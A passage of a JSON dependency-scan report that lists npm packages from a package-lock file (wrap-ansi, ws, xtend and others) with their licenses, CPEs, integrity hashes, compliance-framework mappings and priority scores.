"GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "20ac7377e7b68a5f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: which-module 2.0.1", "title": "which-module 2.0.1", "description": "Package discovered: which-module 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e9c9cc83bf436fd2", "name": "which-module", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:which-module:which-module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:which-module:which_module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:which_module:which-module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:which_module:which_module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:which:which-module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:which:which_module:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/which-module@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/which-module/-/which-module-2.0.1.tgz", "integrity": "sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9ffab25d563bb6a3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: wrap-ansi 6.2.0", "title": "wrap-ansi 6.2.0", "description": "Package discovered: wrap-ansi 6.2.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1fadca0371d5cfaf", "name": "wrap-ansi", "version": "6.2.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap-ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap_ansi:6.2.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/wrap-ansi@6.2.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-6.2.0.tgz", "integrity": "sha512-r6lPcBGxZXlIcymEu7InxDMhdW0KDxpLgoFLcguasxCaJ/SOIZwINatK9KY/tf+ZrlywOKU0UDj3ATXUBfxJXA==", "dependencies": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", "strip-ansi": "^6.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8455272704618757", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: wrap-ansi 7.0.0", "title": "wrap-ansi 7.0.0", "description": "Package discovered: wrap-ansi 7.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "336621830c576ca4", "name": "wrap-ansi", "version": "7.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap-ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap_ansi:7.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/wrap-ansi@7.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", "dependencies": { "ansi-styles": "^4.0.0", "string-width": "^4.1.0", "strip-ansi": "^6.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "686325d7e763de93", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: wrap-ansi 8.1.0", "title": "wrap-ansi 8.1.0", "description": "Package discovered: wrap-ansi 8.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "49a7c54fcd626265", "name": "wrap-ansi", "version": "8.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:wrap-ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap-ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap-ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap_ansi:wrap_ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap-ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:wrap:wrap_ansi:8.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/wrap-ansi@8.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", "dependencies": { "ansi-styles": "^6.1.0", "string-width": "^5.0.1", "strip-ansi": "^7.0.1" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "20b8ef0a2e52c375", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: wrappy 1.0.2", "title": "wrappy 1.0.2", "description": "Package discovered: wrappy 1.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3d054461229ae629", "name": "wrappy", "version": "1.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:wrappy:wrappy:1.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/wrappy@1.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "d249fddb72dddcbc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: ws 8.18.3", "title": "ws 8.18.3", "description": "Package discovered: ws 8.18.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "20d4f853542f41c9", "name": "ws", "version": "8.18.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:ws_project:ws:8.18.3:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/ws@8.18.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/ws/-/ws-8.18.3.tgz", "integrity": "sha512-PEIGCY5tSlUt50cqyMXfCzX+oOPqN0vuGqWzbcJ2xvnkzkq46oOpz7dQaTDBdfICb4N14+GARUDw2XV2N4tvzg==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c71da5915aeb2537", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: xmlbuilder 13.0.2", "title": "xmlbuilder 13.0.2", "description": "Package discovered: xmlbuilder 13.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0872acd31442749a", "name": "xmlbuilder", "version": "13.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:xmlbuilder:xmlbuilder:13.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/xmlbuilder@13.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-13.0.2.tgz", "integrity": "sha512-Eux0i2QdDYKbdbA6AM6xE4m6ZTZr4G4xF9kahI2ukSEMCzwce2eX9WlTI5J3s+NU7hpasFsr8hWIONae7LluAQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "fd4707cd0572bee3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: xmlhttprequest-ssl 2.1.2", "title": "xmlhttprequest-ssl 2.1.2", "description": "Package discovered: xmlhttprequest-ssl 2.1.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "9551f10f27f0ee2d", "name": "xmlhttprequest-ssl", "version": "2.1.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:xmlhttprequest-ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:xmlhttprequest_ssl:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:xmlhttprequest:xmlhttprequest-ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:xmlhttprequest:xmlhttprequest_ssl:2.1.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/xmlhttprequest-ssl@2.1.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/xmlhttprequest-ssl/-/xmlhttprequest-ssl-2.1.2.tgz", "integrity": "sha512-TEU+nJVUUnA4CYJFLvK5X9AOeH4KvDvhIfm0vV1GaQRtchnG0hgK5p8hw/xjv8cunWYCsiPCSDzObPyhEwq3KQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "a5a624f94f45bfc0", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: xtend 4.0.2", "title": "xtend 4.0.2", "description": "Package discovered: xtend 4.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "6f2d4b5e4aa5bc10", "name": "xtend", "version": "4.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:xtend:xtend:4.0.2:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/xtend@4.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/xtend/-/xtend-4.0.2.tgz", "integrity": "sha512-LKYU1iAXJXUgAXn9URjiu+MWhyUXHsvfp7mcuYm9dSUKK0/CjtrUwFAxD82/mCWbtLsGjFIad0wIsod4zrTAEQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "5d318a2cd2d1309b", 